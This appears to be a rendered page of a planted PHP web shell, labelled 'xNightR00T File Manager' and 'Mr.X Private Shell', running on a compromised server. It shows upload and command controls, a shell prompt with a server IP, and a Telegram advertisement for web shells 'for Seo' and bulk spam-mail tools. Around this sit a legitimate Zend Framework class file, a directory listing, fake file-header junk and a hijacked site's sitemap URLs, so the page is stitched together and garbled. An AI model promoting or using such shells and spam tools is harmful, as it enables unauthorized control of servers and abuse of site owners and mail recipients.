xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

require_once 'ZendX/Service/ZendServer/ApplicationServer.php';
require_once 'ZendX/Service/ZendServer/Message.php';

class ZendX_Service_ZendServer_ApplicationInfo
{
    /**
     * Application Status Codes
     */
    const OK               = 'deployed';
    const STAGING          = 'staging';
    const ACTIVATING       = 'activating';
    const DEACTIVATING     = 'deactivating';
    const UNSTAGING        = 'unstaging';
    const UNKNOWN          = 'unknown';
    const INCONSISTENT     = 'inconsistent';
    const UPLOAD_ERROR     = 'uploadError';
    const STAGE_ERROR      = 'stageError';
    const ACTIVAE_ERROR    = 'activeError';
    const DEACTIVATE_ERROR = 'deactivateError';
    const UNSTAGE_ERROR    = 'unstageError';
    const NOT_EXISTS       = 'notExists';

    /**
     * Application ID
     *
     * @var integer
     */
    protected $_id = null;

    /**
     * Application base URL
     *
     * @var string
     */
    protected $_baseUrl = null;

    /**
     * Application name
     *
     * @var string
     */
    protected $_appName = null;

    /**
     * Application name as defined by the user
     *
     * @var string
     */
    protected $_userAppName = null;

    /**
     * Installed Location
     *
     * @var string
     */
    protected $_installedLocation = null;

    /**
     * Application Status. Will be equal to one of ths status constants.
     *
     * @var string
     */
    protected $_status = null;

    /**
     * List of servers and their status
     *
     * @var array of ApplicationServer objects
     */
    protected $_servers = array();

    /**
     * Deployed versions
     *
     * @var array of deployed versions
     */
    protected $_deployedVersions = array();

    /**
     * Array of messages
     *
     * @var array of Message objects
     */
    protected $_messages = array();

	/**
     * Create a new applicationInfo object from a response XML element
     *
     * @param SimpleXMLElement $responseXml
     */
    public function __construct(SimpleXMLElement $xml)
    {
        if ($xml->getName() != 'applicationInfo') {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Unexpected base XML element: {$xml->getName()}");
        }

        $this->_id = (int) $xml->id;
        if (! $this->_id) {
            require_once 'ZendX/Service/ZendServer/Exception.php';
            throw new ZendX_Service_ZendServer_Exception("Missing required applicationInfo element: id");
        }

        // Set all required string elements
        $elements = array(
            'baseUrl',
            'appName',
            'userAppName',
            'status',
        );

        foreach($elements as $element) {
            $this->{"_$element"} = (string) $xml->{$element};
//             if (! $this->{"_$element"}) {
//                 require_once 'ZendX/Service/ZendServer/Exception.php';
//                 throw new ZendX_Service_ZendServer_Exception("Missing required applicationInfo element: $element");
//             }
        }

        // Installed location may be empty for some responses (e.g. applicationDeploy)
        $this->_installedLocation = (string) $xml->installedLocation;

        foreach($xml->servers->children() as $server) {
            $this->_servers[] = new ZendX_Service_ZendServer_ApplicationServer($server);
        }

        foreach((array)$xml->deployedVersions->deployedVersion as $version) {
            $this->_deployedVersions[] = (string) $version;
        }

        foreach($xml->messageList->children() as $message) {
            $this->_messages[] = new ZendX_Service_ZendServer_Message($message);
        }
    }

	/**
	 * Get the application ID
	 *
     * @return integer
     */
    public function getId()
    {
        return $this->_id;
    }

	/**
	 * Get the application's installed base URL
	 *
     * @return string
     */
    public function getBaseUrl()
    {
        return $this->_baseUrl;
    }

	/**
	 * Get the application name as defined in the app package
	 *
     * @return string
     */
    public function getAppName()
    {
        return $this->_appName;
    }

	/**
	 * Get the name given to this application by the user
	 *
     * @return string
     */
    public function getUserAppName()
    {
        return $this->_userAppName;
    }

	/**
     * Get the location on which this app is installed
     *
     * @return string
     */
    public function getInstalledLocation()
    {
        return $this->_installedLocation;
    }

	/**
     * Get the application Status
     *
     * This will be equal to one of the status constants
     *
	 * @return string
     */
    public function getStatus()
    {
        return $this->_status;
    }

	/**
     * Get the list of servers on which the app is deployed
     *
     * @return array
     */
    public function getServers()
    {
        return $this->_servers;
    }

	/**
	 * Get the list of deployed versions
	 *
     * @return array
     */
    public function getDeployedVersions()
    {
        return $this->_deployedVersions;
    }

    /**
     * Get the list of messages, if any
     *
     * @return array Array of Message objects
     */
    public function getMessages()
    {
        return $this->_messages;
    }
}

Filemanager

Name Type Size Permission Actions
ApplicationInfo.php File 5.19 KB 0644
ApplicationServer.php File 2.06 KB 0644
ApplicationsList.php File 2.51 KB 0644
Exception.php File 1.56 KB 0644
LibraryInfo.php File 4.25 KB 0644
LicenseInfo.php File 2.99 KB 0644
Message.php File 1.1 KB 0644
Response.php File 5.99 KB 0644
ServerInfo.php File 3.68 KB 0644
ServersList.php File 2.02 KB 0644
SystemInfo.php File 2.96 KB 0644
bootstrapResponse.php File 2.35 KB 0644
libraryVersion.php File 2.38 KB 0644
vhostInfo.php File 2.42 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml